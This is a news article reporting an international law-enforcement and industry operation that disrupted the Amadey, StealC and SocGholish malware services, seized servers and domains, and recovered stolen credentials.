Global operation disrupts malware services tied to stolen credentials
Authorities and technology companies say Operation Endgame hit malware networks used to steal credentials, spread ransomware and commit fraud.
By Maya Lindqvist · Senior Technology Correspondent
3 min read
International law enforcement agencies and private technology companies say they disrupted malware networks that helped criminals break into devices, steal logins and move money through scams. The coordinated action targeted services that authorities describe as part of a broader cybercrime supply chain.
Microsoft said Wednesday that the operation focused on Amadey and StealC, two separate crimeware platforms that are often used together by attackers. Europol said the broader Operation Endgame effort also disrupted SocGholish, a malware loader associated with the Russian cybercrime group Evil Corp.
Two services hit in one legal action
Amadey is a malware-as-a-service platform used to compromise computers and install other malicious tools, including ransomware payloads, according to Microsoft. The malware has been observed in active attacks since at least 2018.
StealC is sold as an information-stealing service, according to Microsoft and security firms involved in the operation. It is designed to collect passwords, authentication cookies, cryptocurrency wallets, browser-extension data and files that match patterns chosen by its customers.
Microsoft said its analysis found that Amadey and StealC, while operated separately, relied on some of the same infrastructure. The company said that finding came from AI-assisted analysis and allowed its lawyers to seek a court order that addressed both tools in one action.
Microsoft said it used racketeering statutes commonly associated with organized-crime cases to argue that the two services were part of a single conspiracy. The company said the action disrupted more than 200 command-and-control servers and cut off criminal control of more than 18,000 infected computers.
Servers, domains and stolen credentials seized
Europol said law enforcement and private-sector partners took action against 326 servers and 142 domains. The agency said investigators recovered as many as 27 million stolen login credentials and identified $47 million in crypto assets it described as criminal in origin.
Europol said the simultaneous disruption of the tools was intended to make cyberattacks harder to run, spread and rebuild after takedowns. Countries involved in the enforcement action included Canada, Denmark, Germany, the Netherlands, the United Kingdom and the United States, according to the agency.
Several private companies assisted in the work, including ESET, Proofpoint, IBM X-Force, Bitsight and Mitsui Bussan Secure Directions, according to public statements from the firms and Europol.
SocGholish sites cleaned
Europol said Operation Endgame also struck SocGholish, which spreads through compromised websites. Visitors to those sites are tricked into installing malicious software that poses as browser extensions or other legitimate applications, according to the agency.
Europol said authorities responded by cleaning infected WordPress sites and advising site administrators to change credentials and improve security. The agency also said it worked to notify people and organizations whose data or credentials were exposed through SocGholish activity.
Microsoft described the targeted services as a cybercrime “assembly line,” with Amadey helping attackers gain access to devices and StealC taking passwords and other sensitive data. Europol said the operation was designed to sever that connection and raise the cost for criminal groups that depend on shared malware infrastructure.
This story draws on original reporting from Ars Technica.